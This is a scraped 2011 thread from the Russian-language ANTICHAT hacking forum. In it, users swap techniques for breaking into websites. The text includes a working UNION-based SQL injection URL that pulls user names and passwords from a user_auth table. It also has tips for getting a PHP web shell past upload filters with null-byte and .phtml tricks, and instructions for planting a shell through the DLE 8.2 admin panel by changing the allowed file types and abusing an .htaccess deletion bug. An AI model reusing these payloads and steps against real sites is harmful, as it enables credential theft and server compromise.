ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.11.2011, 22:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от SergioBlog
SergioBlog said:
Если отрублены функции exec,passthru,popen,proc_open,shell_exec,system,pc ntl_exec есть другие варианты?)))
perl, python, ssi, disable_functions bypass
|
|
|
|
05.11.2011, 23:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
3346
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
Код:
Code:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_name,user_password)))+from+user_auth+limit+0,1--+
скобку пропустил вставил не помогает =(
|
|
|
|
05.11.2011, 23:54
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Хочу залить шелл через баннер / картинку...
Побываю так shell.php%00.gif shell.php.gif если просто shell.php то режет...Локального инклуда нет
Есть ещё варианты?
|
|
|
06.11.2011, 11:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Einstein,
Код HTML:
HTML:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat(user_name,char(58),user_password)))+from+0x757365725f61757468+limit+0,1--+[/HTML
[B]aydin-ka[/B],
Название CMS? Попробуй старый добрый *.phtml.
|
|
|
|
06.11.2011, 12:32
|
|
Новичок
Регистрация: 17.01.2009
Сообщений: 7
Провел на форуме:
441482
Репутация:
9
|
|
иметься доступ в админ ку DLE V8.2 требуется залить шелл через админ ку как это сделать ?
|
|
|
|
06.11.2011, 12:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
-=Sinner=-,
через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.
|
|
|
|
06.11.2011, 12:46
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от -=Sinner=-
-=Sinner=- said:
иметься доступ в админ ку DLE V8.2 требуется залить шелл через админ ку как это сделать ?
прийдется помудрить с разрешенными раширениями.сначала залей .htaccess потом удаляй его..из за баги удалится оригинальный файл потом уже файл нужный
|
|
|
|
06.11.2011, 12:49
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от tabletkO
tabletkO said:
-=Sinner=-
,
через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.
и часто ты так заливал? и у тебя шелл работал?
|
|
|
|
06.11.2011, 12:55
|
|
Новичок
Регистрация: 17.01.2009
Сообщений: 7
Провел на форуме:
441482
Репутация:
9
|
|
Сообщение от tabletkO
tabletkO said:
-=Sinner=-
,
через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.
Разрешения загружаемых файлов dzmvdq,pdf,htaccess,php,zip,rar,phtml,doc,exe
так же доступна загрузка изображений с самой админки может это как то облегчит заливку шелла ?
|
|
|
|
06.11.2011, 13:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Gorev,
да работал, но конечно сначала удалил .htaccess...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
